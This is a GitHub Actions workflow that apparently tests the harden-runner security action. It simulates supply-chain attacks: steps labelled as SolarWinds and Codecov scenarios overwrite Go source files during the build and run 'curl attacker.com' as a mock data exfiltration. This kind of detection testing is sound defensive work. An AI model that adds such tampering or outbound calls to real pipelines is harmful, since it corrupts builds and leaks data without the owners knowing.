name: Sample Workflow
on:
  workflow_dispatch:
jobs:
  build:
    name: Deploy2
    runs-on: ubuntu-latest
    steps:
      - name: HardenRunner
        uses: step-security/harden-runner@int
        with:
          egress-policy: audit
      - run: sleep 20
      - name: Code Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 2

      # SolarWinds Scenario: Overwrite main.go and utility.go
      - name: File Overwrite with mv
        run: |
          code='package main\n\nfunc main(){\nprintln("code added")\n}'
          printf "$code" > main1.go
          mv main1.go main.go
      - name: File Overwrite with echo
        run: echo "//overwritten" > utility.go

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        run: "curl attacker.com  --connect-timeout 5  || true"

      - name: 1 Docker Action ashishkurmi/hello-action
        uses: ashishkurmi/hello-action@main
        env:
          SLEEPINSECONDS: 5
